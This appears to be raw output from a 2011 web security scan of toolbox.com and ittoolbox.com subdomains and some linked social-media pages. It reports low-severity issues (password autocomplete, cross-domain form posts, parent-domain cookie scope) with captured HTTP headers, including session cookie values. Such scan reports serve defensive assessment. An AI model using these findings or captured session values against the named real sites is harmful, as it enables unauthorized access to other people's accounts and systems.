HTTP/1.1 200 OK Cache-Control: private Content-Length: 81717 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:49 GMT Connection: close
The page contains a form with the following action URL:
http://hardware.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: hardware.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78653 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3wjpn4yajv3hcfa0fidd3prk; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:50 GMT Connection: close
The page contains a form with the following action URL:
http://infor.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: infor.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 54154 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=laxlg3yxtwdispubbh1xwd45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:00 GMT Connection: close
The page contains a form with the following action URL:
http://it.toolbox.com/groups/
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /groups/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79052 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Groups
The page contains a form with the following action URL:
http://java.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: java.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 59140 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=oyzpf135dvjl5u4503tynefb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:01 GMT Connection: close
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: knowledgemanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71256 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=b5wett3jdmxpvtvb4e4glymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:06 GMT Connection: close
The page contains a form with the following action URL:
http://linux.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: linux.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72604 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fxf05445egzyff3bwiyjik3x; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:10 GMT Connection: close
The page contains a form with the following action URL:
http://networking.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: networking.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 91759 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=5kuwlnb05jml5f45ib34n555; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:14 GMT Connection: close
The page contains a form with the following action URL:
http://oracle.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: oracle.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78126 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=dnzjqj45bhnnumaespuasb45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
The page contains a form with the following action URL:
http://peoplesoft.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: peoplesoft.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70995 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fjxtzvek1n24rc3qv05z1gbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: projectmanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70396 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x1kl5s4525t13p45bqmqziut; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:22 GMT Connection: close
The page contains a form with the following action URL:
http://sap.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: sap.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 83566 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uelcsg55rouamz55yuh1o455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:36 GMT Connection: close
The page contains a form with the following action URL:
http://security.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: security.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81934 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mruc2m45webcko55sgy2f5jm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:33 GMT Connection: close
The page contains a form with the following action URL:
http://siebel.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: siebel.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72499 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=yvvy0cefbpzquq2it2cgzprn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:39 GMT Connection: close
The page contains a form with the following action URL:
http://storage.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: storage.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71718 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=qoshvh55jsp2ig55kw2vi245; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:41 GMT Connection: close
The page contains a form with the following action URL:
http://supplychain.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: supplychain.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74807 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=rqqjl3aklble05amudmoqvyc; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:42 GMT Connection: close
The page contains a form with the following action URL:
http://telephony.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: telephony.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62475 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3eypwe552rukfx2gthccur2v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:49 GMT Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /toolboxdotcom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:29 GMT Server: hi Status: 200 OK X-Transaction: 1296053789-52552-6574 ETag: "cba3bfc96bf68c050adb0ae164dc8175" Last-Modified: Wed, 26 Jan 2011 14:56:29 GMT X-Runtime: 0.01600 Content-Type: text/html; charset=utf-8 Content-Length: 51936 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053788039947; path=/; expires=Wed, 02-Feb-11 14:56:28 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY4MmYzNTRlZWE2MzBkYjZlMzAxMGM2YmExZmIzMTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbmHTwi0B--5f068f484769ee483f9eaf437005d73e90b46f16; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /toolboxforit HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:27 GMT Server: hi Status: 200 OK X-Transaction: 1296053787-90115-59528 ETag: "88e9aa64188f9d64f88986da2628b13f" Last-Modified: Wed, 26 Jan 2011 14:56:27 GMT X-Runtime: 0.01067 Content-Type: text/html; charset=utf-8 Content-Length: 45652 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053787142478; path=/; expires=Wed, 02-Feb-11 14:56:27 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378737979704; path=/; expires=Fri, 25 Feb 2011 14:56:27 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTljM2MwNTc3NjdjNTdhMzAyZDA4OTRlY2U5NzliMjM0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI9VrTwi0B--bba18e9789744f8014c5ff57c43fcea71113a57e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
http://unix.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: unix.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80502 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ciicu055vtcjje45vlgvahbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:56 GMT Connection: close
The page contains a form with the following action URL:
http://visualbasic.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: visualbasic.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63969 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pr5xja553zbb0s45ijt4gx45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
The page contains a form with the following action URL:
http://webdesign.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: webdesign.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79392 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=e3e0aj55kknpbv2uorfonxy4; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
The page contains a form with the following action URL:
http://windows.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: windows.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 77587 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=nseiegiwhp2img3lqow10z3v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... </div> <form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm"> <div> ...[SNIP]... <div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="<% =btnSignIn.ClientID %>" /></div> ...[SNIP]...
The page contains a form with the following action URL:
http://wireless.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: wireless.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73493 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ssd5o2akjvnbi055fht5lga2; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:00 GMT Connection: close
The page contains a form with the following action URL:
http://www.ebizq.net/goldclub/login.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /blogs/saasweek/ HTTP/1.1 Host: www.ebizq.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:56:55 GMT Server: Apache/2.0.46 (Red Hat) Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56022
The form contains the following password field with autocomplete enabled:
pass
Request
GET /pages/Toolboxcom/117012708708 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ODZATe8iFsKm4n_Xjpn2xOrf; expires=Fri, 25-Jan-2013 14:56:56 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=4TIUB; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Wed, 26 Jan 2011 14:56:57 GMT Content-Length: 154510
The page contains a form with the following action URL:
http://www.toolbox.com/Feedback.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /Feedback.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 24211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x4f3gn55elbncwac4bzxhvnv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:46 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/PrivacyPolicy.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /PrivacyPolicy.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35183 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ooszoo554q0sbqbgcenmvfuw; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/TermsofUse.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /TermsofUse.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46350 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3xmjev553fihez45e2oo2ivi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/about/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /about/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 22640 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=orhdbf455xhzzen32ok4mn2c; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:40 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/careers/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /careers/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19781 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=w25wtxbkl34gxdreyk40jymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/contact/
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /contact/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=icbksg45hpzrcf55h0vo2x45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/it/advertising/
The form contains the following password field with autocomplete enabled:
ctl00$ctl00$m$txtSignin_Password
Request
GET /it/advertising/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 26971 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/news/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /news/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21896 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ugckar45ukzeih55dzbcsf45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
The page contains a form which POSTs data to the domain creator.zoho.com. The form contains the following fields:
formid
formLinkId
formLinkName
tableName
viewid
recType
viewLinkName
pkValue
dateFormat
timeZone
uiDateFormat
fromIDX
privatelink
viewPrivateLink
appLinkName
sharedBy
scriptembed
nexturl
Name
Email_ID
submit
subject
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /products/desktop-central/index.html HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:01 GMT Server: Apache Last-Modified: Mon, 24 Jan 2011 13:46:19 GMT ETag: "16060-d315c0c0" Accept-Ranges: bytes Content-Length: 90208 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:01 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /directory/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 52564 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/it.toolbox.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fit.toolbox.com%2Fblogs%2Fppmtoday%2Fventure-and-gender-43847&ref=http%3A%2F%2Fburp%2Fshow%2F4&1yua7sg HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
